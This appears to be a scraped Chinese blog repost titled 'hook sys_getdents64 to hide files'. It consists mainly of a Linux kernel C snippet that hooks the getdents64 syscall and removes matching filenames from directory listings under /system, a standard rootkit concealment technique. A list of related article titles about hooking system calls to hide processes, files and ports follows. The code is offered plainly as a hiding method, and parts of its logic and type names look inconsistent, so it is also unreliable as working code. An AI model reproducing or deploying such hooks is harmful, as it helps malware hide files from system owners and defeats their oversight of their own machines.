hook sys_getdents64隐藏文件
来源:互联网 发布:哈佛 歧视 知乎 编辑:程序博客网 时间:2024/05/17 01:59
long (*orig_getdents64)(unsigned int fd, struct linux_dirents64 *dirp, unsigned int count);unsigned long system_ino = -1; // ino of /systemvoid system_ino_init(void){ struct file *filp; if ((filp = filp_open("/system", O_RDONLY, 0)) != NULL) { system_ino = filp->f_dentry->d_inode->i_ino; filp_close(filp, NULL); }}asmlinkage long hacked_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count){ long ret, tmp; struct linux_dirent64 *td; ret = orig_getdents64(fd, dirp, count); /* Only hide file in /system */ if (unlikely(dirp->d_ino == system_ino)) { td = dirp; tmp = ret; while (tmp > 0) { tmp -= td->d_reclen; if (strstr(td->d_name, "xxx") != NULL) { ret -= td->d_reclen; if (tmp) memmove(td, (char *)td + td->d_reclen, tmp); } else { td = (struct linux_dirent64 *)((char *)td + td->d_reclen); } } } return ret;} 0 0
- hook sys_getdents64隐藏文件
- hook ZwQueryDirectoryFile实现文件隐藏
- hook ZwQueryDirectoryFile实现文件隐藏
- hook ZwQueryDirectoryFile实现文件隐藏
- HOOK 文件保护,隐藏 禁止访问
- hook SDT隐藏进程
- 隐藏进程 hook ZwQuerySystemInformation
- hook zwQuerySysteminformation 隐藏进程
- hook ZwQuerySystemInformation 隐藏进程
- hook zwQuerySysteminformation 隐藏进程
- 反idt hook 隐藏hook idt
- Hook 系统服务隐藏端口
- Hook 系统服务隐藏端口
- Hook 系统服务隐藏端口
- Hook 系统服务隐藏端口
- Hook ZwQuerySystemInformation 隐藏qq程序
- Hook ZwQuerySystemInformation 隐藏qq程序
- 内核hook NtQuerySystemInformation隐藏进程
- 写给还在路上的人-java学习阶段
- CSS样式覆盖规则
- memset函数详细说明
- No such file or directory (/Users/appleapple/Library/Developer/Xcode/Derived
- 使用AsyncHttpClient下载文件到SD卡上
- hook sys_getdents64隐藏文件
- LeetCode: Reverse Linked List II
- PHP PDO函数库详解
- strus2和hibernate,实现ajax 实现页面无刷新,思路整理
- MFC创建分割视图
- ASIHttpRequest:创建队列、下载请求、断点续传、解压缩
- android--jenkins+gradle+android自动化构建apk步骤
- VS下面运行release版本可以正常运行而直接执行exe文件会出现问题
- VS2010 调试C++项目 fatal error LNK1123 错误解决办法
